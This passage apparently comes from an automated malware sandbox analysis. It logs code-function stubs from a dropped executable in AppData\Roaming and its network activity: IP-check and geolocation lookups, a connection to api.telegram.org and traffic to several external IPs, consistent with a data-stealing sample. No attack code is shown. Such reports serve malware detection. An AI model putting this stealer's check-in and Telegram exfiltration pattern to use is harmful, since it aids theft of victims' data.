                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00614C51h13_2_00614980
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061B57Ah13_2_0061B280
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0061E082h13_2_0061DD88
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00612C69h13_2_00612998
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00619D92h13_2_00619A98
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0073033Ah13_2_00730040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00731B22h13_2_00731828
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0073330Ah13_2_00733010
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00731FEAh13_2_00731CF0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 007337D2h13_2_007334D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00731192h13_2_00730E98
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0073297Ah13_2_00732680
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 0073165Ah13_2_00731360
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00732E42h13_2_00732B48
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00730802h13_2_00730508
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00730CCAh13_2_007309D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 007324B3h13_2_007321B8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 00733C9Ah13_2_007339A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B6B91h13_2_008B68E8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B5A31h13_2_008B5788
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BE1C5h13_2_008BDE88
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BD429h13_2_008BD180
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B4D29h13_2_008B4A80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B7441h13_2_008B7198
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B6739h13_2_008B6490
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BF579h13_2_008BF2A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B8E51h13_2_008B8BA8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B8149h13_2_008B7EA0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B9B59h13_2_008B98B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B3771h13_2_008B34C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BBE71h13_2_008BBBC8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BB169h13_2_008BAEC0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B5181h13_2_008B4ED8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BD881h13_2_008BD5D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BCB7Bh13_2_008BC8D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B4479h13_2_008B41D0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B5E89h13_2_008B5BE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BE7B1h13_2_008BE4E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B85A1h13_2_008B82F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B7899h13_2_008B75F0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B92A9h13_2_008B9000
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BB5C1h13_2_008BB318
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BF0E1h13_2_008BEE10
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BCFD1h13_2_008BCD28
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B48D1h13_2_008B4628
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BC2C9h13_2_008BC020
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B3BC9h13_2_008B3920
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B62E1h13_2_008B6038
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B55D9h13_2_008B5330
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BDCD9h13_2_008BDA30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B7CF1h13_2_008B7A48
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BFA11h13_2_008BF740
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B6FE9h13_2_008B6D40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B9701h13_2_008B9458
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B89F9h13_2_008B8750
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BAD11h13_2_008BAA68
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B4021h13_2_008B3D78
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BC721h13_2_008BC478
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BEC49h13_2_008BE978
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008BBA19h13_2_008BB770
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then jmp 008B3319h13_2_008B3070
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_00C55F38
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_00C52AF9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_00C52B00
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_00C55F28
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49184 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                  Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
